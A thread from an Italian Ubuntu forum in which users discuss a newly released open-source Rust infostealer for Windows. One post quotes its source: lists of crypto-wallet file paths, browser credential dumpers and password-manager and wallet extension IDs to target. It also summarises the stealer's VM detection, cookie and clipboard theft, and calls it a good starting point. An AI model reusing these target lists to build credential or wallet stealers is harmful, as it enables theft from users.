New Open Source Malware

Il ritrovo della comunità dove confrontarsi e discutere sulle notizie dal mondo dell'informatica, di Ubuntu e di tutto quello che la riguarda, novità, pettegolezzi e quant'altro.
Avatar utente
derma
Rampante Reduce
Rampante Reduce
Messaggi: 7139
Iscrizione: martedì 5 settembre 2006, 20:07
Desktop: mate
Distribuzione: Ubuntu 20.04.4 LTS
Località: Sicilia
Contatti:

Re: New Open Source Malware

Messaggio da derma »

Ma davvero nessuno sa cosa faccia questo malware, quale sia il suo scopo?


Spoiler
Mostra
I bambini che giocano con le palle in spiaggia sono insopportabili.
“Siediti lungo la riva del fiume e aspetta,        __Ŧ__  
prima o poi vedrai passare il cadavere del tuo nemico”     '\°°/'
💉  🡺  ⚠️         ⏺       False Flag   🡺   🇺🇦                                                              | | | | Drive | _/- Γı |V| F · Γ| |7 F · |\| Γı -|- · |-| |_| |V| Γ| |\| () Γı /\ ı\   |7 Γı Γı Γı -|-
Avatar utente
wilecoyote
Tenace Tecnocrate
Tenace Tecnocrate
Messaggi: 15349
Iscrizione: giovedì 20 agosto 2009, 16:21
Desktop: Kubuntu et alii
Distribuzione: 9.04 32bit 14/18/20/22.04 LTS 64bit
Sesso: Maschile
Località: Ceranesi - Ge

Re: New Open Source Malware

Messaggio da wilecoyote »

:) Salve,
derma ha scritto:
sabato 30 luglio 2022, 15:03
Spoiler
Mostra
I bambini che giocano con le palle in spiaggia sono insopportabili.
Spoiler
Mostra
Problemi di pedofobia ?
:ciao: Ciao
ACER Extensa 5230E 2,2 Ghz cpu Celeron 900 hdd 160 GB Ram 1 GB scheda video Intel GM500
ACER Extensa 5635Z 2,2 Ghz cpu Celeron T3100 hdd 320 GB Ram 4 GB scheda video Intel Mobile 4
Quando una Finestra chiusa incontra un Pinguino la Finestra chiusa è una Finestra aperta.
Avatar utente
derma
Rampante Reduce
Rampante Reduce
Messaggi: 7139
Iscrizione: martedì 5 settembre 2006, 20:07
Desktop: mate
Distribuzione: Ubuntu 20.04.4 LTS
Località: Sicilia
Contatti:

Re: New Open Source Malware

Messaggio da derma »

wilecoyote ha scritto:
sabato 30 luglio 2022, 16:11
:) Salve,
derma ha scritto:
sabato 30 luglio 2022, 15:03
Spoiler
Mostra
I bambini che giocano con le palle in spiaggia sono insopportabili.
Spoiler
Mostra
Problemi di pedofobia ?
:ciao: Ciao
Spoiler
Mostra
No.
“Siediti lungo la riva del fiume e aspetta,        __Ŧ__  
prima o poi vedrai passare il cadavere del tuo nemico”     '\°°/'
💉  🡺  ⚠️         ⏺       False Flag   🡺   🇺🇦                                                              | | | | Drive | _/- Γı |V| F · Γ| |7 F · |\| Γı -|- · |-| |_| |V| Γ| |\| () Γı /\ ı\   |7 Γı Γı Γı -|-
Avatar utente
Alien321
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1388
Iscrizione: sabato 20 maggio 2006, 20:39
Desktop: KDE 5.16.4
Distribuzione: KDE Neon
Località: Venere

Re: New Open Source Malware

Messaggio da Alien321 »

derma ha scritto:
sabato 30 luglio 2022, 15:03
Ma davvero nessuno sa cosa faccia questo malware, quale sia il suo scopo?


Spoiler
Mostra
I bambini che giocano con le palle in spiaggia sono insopportabili.
Leggendo il sorgente è abbastanza facile capire cosa fa (anche se scritto in Rust) praticamente è un maleware fatto
SOLO per WIndows portarlo su Linux o Mac è impossibile, dovresti riscrivere tanto codice.

Si limita a rubare praticamente tutto:

Wallet di varie criptomonete:

Codice: Seleziona tutto

    hm.insert(
        obfstr::obfstr!("AtomicWallet").to_string(),
        obfstr::obfstr!("%APPDATA%\\atomic\\Local Storage\\leveldb\\").to_string(),
    );
    hm.insert(obfstr::obfstr!("Exodus").to_string(), obfstr::obfstr!("%APPDATA%\\exodus\\exodus.wallet\\").to_string());
    hm.insert(obfstr::obfstr!("JaxxWallet").to_string(),obfstr::obfstr!("%APPDATA%\\Wallets\\Jaxx\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\").to_string());
    hm.insert(obfstr::obfstr!("Electrum").to_string(), obfstr::obfstr!("%APPDATA%\\Electrum\\wallets\\").to_string());
    hm.insert(obfstr::obfstr!("ByteCoin").to_string(), obfstr::obfstr!("%APPDATA%\\bytecoin\\").to_string());
    hm.insert(obfstr::obfstr!("Ethereum").to_string(), obfstr::obfstr!("%APPDATA%\\Ethereum\\keystore\\").to_string());
    hm.insert(obfstr::obfstr!("Guarda").to_string(), obfstr::obfstr!("%APPDATA%\\Guarda\\\\Local Storage\\leveldb\\").to_string());
    hm.insert(obfstr::obfstr!("Coinomi").to_string(), obfstr::obfstr!("%APPDATA%\\Coinomi\\Coinomi\\wallets\\").to_string());
    hm.insert(obfstr::obfstr!("Armory").to_string(), obfstr::obfstr!("%APPDATA%\\Armory\\").to_string());
    hm.insert(obfstr::obfstr!("ZCash").to_string(), obfstr::obfstr!("%APPDATA%\\Zcash\\").to_string());
Wallet dei browser:

Codice: Seleziona tutto

hm.insert("edge", Dumper::new("Edge", "Microsoft"));
    hm.insert("chromium", Dumper::new("", "Chromium"));
    hm.insert("7star", Dumper::new("7Star", "7Star"));
    hm.insert("amigo", Dumper::new("", "Amigo"));
    hm.insert("brave", Dumper::new("Brave-Browser", "BraveSoftware"));
    hm.insert("centbrowser", Dumper::new("", "CentBrowser"));
    hm.insert("chedot", Dumper::new("", "Chedot"));
    hm.insert("chrome_canary", Dumper::new("Chrome SxS", "Google"));
    hm.insert("coccoc", Dumper::new("Browser", "CocCoc"));
    hm.insert("dragon", Dumper::new("Dragon", "Comodo"));
    hm.insert("elements-browser", Dumper::new("", "Elements Browser"));
    hm.insert("epic-privacy-browser",Dumper::new("", "Epic Privacy Browser"),);
    hm.insert("chrome", Dumper::new("Chrome", "Google"));
    hm.insert("kometa", Dumper::new("", "Kometa"));
    hm.insert("orbitum", Dumper::new("", "Orbitum"));
    hm.insert("sputnik", Dumper::new("Sputnik", "Sputnik"));
    hm.insert("torch", Dumper::new("", "Torch"));
    hm.insert("ucozmedia", Dumper::new("Uran", "uCozMedia"));
    hm.insert("vivaldi", Dumper::new("", "Vivaldi"));
    hm.insert("atom-mailru", Dumper::new("Atom", "Mail.Ru"));
    hm.insert("opera", Dumper::new("Opera Software", "Opera Stable"));
    hm.insert("opera-gx", Dumper::new("Opera Software", "Opera GX Stable"));
    hm.insert("ChromePlus", Dumper::new("MappleStudio", "ChromePlus"));
    hm.insert("Iridium", Dumper::new("Iridium", "Iridium"));
    hm.insert("Iridium", Dumper::new("", "Iridium"));
    hm.insert("fenrir-inc", Dumper::new("sleipnir5", "settings"));
    hm.insert("catalinagroup", Dumper::new("CatalinaGroup", "Citrio"));
    hm.insert("Coowoo", Dumper::new("", "Coowoo"));
    hm.insert("liebao", Dumper::new("", "liebao"));
    hm.insert("qip-surf", Dumper::new("", "Qip Surf"));
    hm.insert("360browser", Dumper::new("360Browser", "Browser"));
Estensione dei browser:

Codice: Seleziona tutto

let mut extensions = std::collections::HashMap::new(); 
    extensions.insert("Authenticator",         "bhghoamapcdpbohphigoooaddinpkbai");
   extensions.insert("EOS Authenticator",       "oeljdldpnmdbchonielidgobddffflal");
   extensions.insert("Bitwarden",               "nngceckbapebfimnlniiiahkandclblb");
   extensions.insert("KeePassXC",               "oboonakemofpalcgghocfoadofidjkkk");
   extensions.insert("Dashlane",                "fdjamakpfbbddfjaooikfcpapjohcfmg");
   extensions.insert("1Password",               "aeblfdkhhhdcdjpifhhbdiojplfjncoa");
   extensions.insert("NordPass",                "fooolghllnmhmmndgjiamiiodkpenpbb");
   extensions.insert("Keeper",                  "bfogiafebfohielmmehodmfbbebbbpei");
   extensions.insert("RoboForm",                "pnlccmojcmeohlpggmfnbbiapkmbliob");
   extensions.insert("LastPass",                "hdokiejnpimakedhajhdlcegeplioahd");
   extensions.insert("BrowserPass",             "naepdomgkenhinolocfifgehidddafch");
   extensions.insert("MYKI",                    "bmikpgodpkclnkgmnpphehdgcimmided");
   extensions.insert("Splikity",                "jhfjfclepacoldmjmkmdlmganfaalklb");
   extensions.insert("CommonKey",               "chgfefjpcobfbnpmiokfjjaglahmnded");
   extensions.insert("Zoho Vault",              "igkpcodhieompeloncfnbekccinhapdb");
   extensions.insert("Norton Password Manager", "admmjipmmciaobhojoghlmleefbicajg");
   extensions.insert("Avira Password Manager",  "caljgklbbfbcjjanaijlacgncafpegll");
   extensions.insert("Trezor Password Manager", "imloifkgjagghnncjkhggdhalmcnfklk");    
   extensions.insert("MetaMask",                "nkbihfbeogaeaoehlefnkodbefgpgknn");
   extensions.insert("TronLink",                "ibnejdfjmmkpcnlpebklmnkoeoihofec");
   extensions.insert("BinanceChain",            "fhbohimaelbohpjbbldcngcnapndodjp");
   extensions.insert("Coin98",                  "aeachknmefphepccionboohckonoeemg");
   extensions.insert("iWallet",                 "kncchdigobghenbbaddojjnnaogfppfj");
   extensions.insert("Wombat",                  "amkmjjmmflddogmhpjloimipbofnfjih");
   extensions.insert("MEW CX",                  "nlbmnnijcnlegkjjpcfjclmcfggfefdm");
   extensions.insert("NeoLine",                 "cphhlgmgameodnhkjdmkpanlelnlohao");
   extensions.insert("Terra Station",           "aiifbnbfobpmeekipheeijimdpnlpgpp");
   extensions.insert("Keplr",                   "dmkamcknogkgcdfhhbddcghachkejeap");
   extensions.insert("Sollet",                  "fhmfendgdocmcbmfikdcogofphimnkno");
   extensions.insert("ICONex",                  "flpiciilemghbmfalicajoolhkkenfel");
   extensions.insert("KHC",                     "hcflpincpppdclinealmandijcmnkbgn");
   extensions.insert("TezBox ",                 "mnfifefkajgofkcjkemidiaecocnkjeh");
   extensions.insert("Byone",                   "nlgbhdfgdhgbiamfdfmbikcdghidoadd");
   extensions.insert("OneKey",                  "infeboajgfhgbjpjbeppbkgnabfdkdaf");
   extensions.insert("DAppPlay",                "lodccjjbdhfakaekdiahmedfbieldgik");
   extensions.insert("BitClip",                 "ijmpgkjfkbfhoebgogflfebnmejmfbml");
   extensions.insert("Steem Keychain",          "lkcjlnjfpbikmcmbachjpdbijejflpcm");
   extensions.insert("Nash Extension",          "onofpnbbkehpmmoabgpcpmigafmmnjhl");
   extensions.insert("Hycon Lite Client",       "bcopgchhojmggmffilplmbdicgaihlkp");
   extensions.insert("ZilPay",                  "klnaejjgbibmhlephnhpmaofohgkpgkd");
   extensions.insert("Leaf Wallet",             "cihmoadaighcejopammfbmddcmdekcje");
   extensions.insert("Cyano Wallet",            "dkdedlpgdmmkkfjabffeganieamfklkm");
   extensions.insert("Cyano Wallet Pro",        "icmkfkmjoklfhlfdkkkgpnpldkgdmhoe");
   extensions.insert("Nabox Wallet",            "nknhiehlklippafakaeklbeglecifhad");
   extensions.insert("Polymesh Wallet",         "jojhfeoedkpkglbfimdfabpdfjaoolaf");
   extensions.insert("Nifty Wallet",            "jbdaocneiiinmjbjlgalhcelgbejmnid");
   extensions.insert("Liquality Wallet",        "kpfopkelmapcoipemfendmdcghnegimn");
   extensions.insert("Math Wallet",             "afbcbjpbpfadlkmhmclhkeeodmamcflc");
   extensions.insert("Coinbase Wallet",         "hnfanknocfeofbddgcijnmhnfnkdnaad");
   extensions.insert("Clover Wallet",           "nhnkbkgjikgcigadomkphalanndcapjk");
   extensions.insert("Yoroi",                   "ffnbelfdoeiohenkjibnmadjiehjhajb");
   extensions.insert("Guarda",                  "hpglfhgfnhbgpjdenjgmdgoeiappafln");
   extensions.insert("EQUAL Wallet",            "blnieiiffboillknjnepogjhkgnoapac");
   extensions.insert("BitApp Wallet",           "fihkakfobkmkjojpchpfgcmhfjnmnfpi");
   extensions.insert("Auro Wallet",             "cnmamaachppnkjgnildpdmkaakejnhae");
   extensions.insert("Saturn Wallet",           "nkddgncdjgjfcddamfgcmfnlhccnimig");
   extensions.insert("Ronin Wallet",            "fnjhmkhhmkbjkkabndcnnogagogbneec");
   extensions.insert("Exodus",                  "aholpfdialjgjfhomihkjbmgjidlcdno");
   extensions.insert("Maiar DeFi Wallet",       "dngmlblcodfobpdpecaadgfbcggfjfnm");
   extensions.insert("Nami",                    "lpfcbjknijpeeillifnkikgncikgfhdo");
   extensions.insert("Eternl",                  "kmhcihpebfmpgmihbkipmjlmmioameka");
Inoltre ha metodi per capire se gira su macchine virtuali, per decriptare i salvataggi delle password dei maggiori browser per ribare i cookis ecc
ruba anche i dati presenti nella clipboard solo se appartengono a criptomonete.
Ruba anche roba da Skype,Discrod,icq(veramente siamo alla preisotria) gia che c'è anche svariati documenti tipo file con password o txt.

In ogni caso non vedo procedure per diventare invisibile o polimorfio (si riscrive da solo) e non ha mezzi di propagazione, è un ottimo codice da cui partire
molto scolastico.

Naturalmente essendo scritto in Rust non ci capisco molto e non sono un progrmmatore in generale
Spoiler
Mostra
Finalmente è finito carnevale, anche se vedo ancora gente in maschera
Avatar utente
derma
Rampante Reduce
Rampante Reduce
Messaggi: 7139
Iscrizione: martedì 5 settembre 2006, 20:07
Desktop: mate
Distribuzione: Ubuntu 20.04.4 LTS
Località: Sicilia
Contatti:

Re: New Open Source Malware

Messaggio da derma »

@Alien321


Quello che hai scritto già si evinceva dal semplice screenshot del primo post...
Immagine

...anche senza andare a vedere il tweet... https://twitter.com/wallet_guard/status ... Lkt4krAAAA ...però, magari, dato che hai detto non essere tu un programmatore, aspetto che ne passi di qua uno che sappia dire in che modo sia tale malware pericoloso - il linguaggio Rust mi è in pratica sconosciuto; a quanto pare, sembra non lo conosca nessuno!

Spoiler
Mostra
I bambini che giocano con le palle in spiaggia sono insopportabili.
“Siediti lungo la riva del fiume e aspetta,        __Ŧ__  
prima o poi vedrai passare il cadavere del tuo nemico”     '\°°/'
💉  🡺  ⚠️         ⏺       False Flag   🡺   🇺🇦                                                              | | | | Drive | _/- Γı |V| F · Γ| |7 F · |\| Γı -|- · |-| |_| |V| Γ| |\| () Γı /\ ı\   |7 Γı Γı Γı -|-
Scrivi risposta

Ritorna a “Bar Ubuntu”

Chi c’è in linea

Visualizzano questa sezione: 0 utenti iscritti e 6 ospiti